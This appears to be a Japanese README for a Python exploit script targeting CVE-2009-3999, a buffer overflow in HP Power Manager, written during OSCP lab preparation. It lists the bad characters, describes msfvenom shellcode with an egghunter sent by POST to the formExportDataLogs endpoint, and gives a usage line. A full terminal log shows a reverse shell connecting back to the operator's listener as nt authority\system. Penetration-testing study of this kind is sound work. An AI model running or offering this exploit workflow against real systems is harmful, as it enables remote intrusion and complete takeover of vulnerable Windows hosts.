
CVE-2009-3999のためのPythonで書かれた自動スクリプト
OSCPの準備の一環として、私はCVE-2009-3999(HP Power Manager 4.2 (Build 7) バッファオーバーフローエクスプロイト)に出会いました。
この最新のスクリプトは、文字列とバイトの処理に関するPython 3互換性の問題を解決するために更新されており、ペイロードが生のバイナリとして送信されることでメモリ破損を防ぎます。
このバージョンでは、自動化されたmsfvenom統合により、正しいバッドキャラクタ(\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c)を含むシェルコードを動的に生成し、それを特別なエッグハンターに付加し、最終的なペイロードをformExportDataLogsエンドポイントへのPOSTリクエストで送信します。教育目的およびセキュリティ監査のために設計されており、シェルコードの生成とリスナーの起動を一元管理することで、エクスプロイトのワークフローを簡素化します。
使用方法: python3 CVE-2009-3999.py <TARGET-IP> <TARGET-PORT> <LHOST> <LPORT>
┌──(venv)─(root㉿user)-[/run/…/user/2024/HTBox/kevin]
└─# python3 exp6.py 192.168.147.45 80 192.168.45.183 4444
[*] Generating msfvenom payload for 192.168.45.183:4444...
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with Encoding failed due to a nil character
Attempting to encode payload with 1 iterations of x86/call4_dword_xor
x86/call4_dword_xor succeeded with size 348 (iteration=0)
x86/call4_dword_xor chosen with final size 348
Payload size: 348 bytes
Final size of python file: 1953 bytes
[+] Sending exploit to 192.168.147.45:80
[+] Exploit sent. Starting listener on 4444...
listening on [any] 4444 ...
connect to [192.168.45.183] from (UNKNOWN) [192.168.147.45] 49168
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system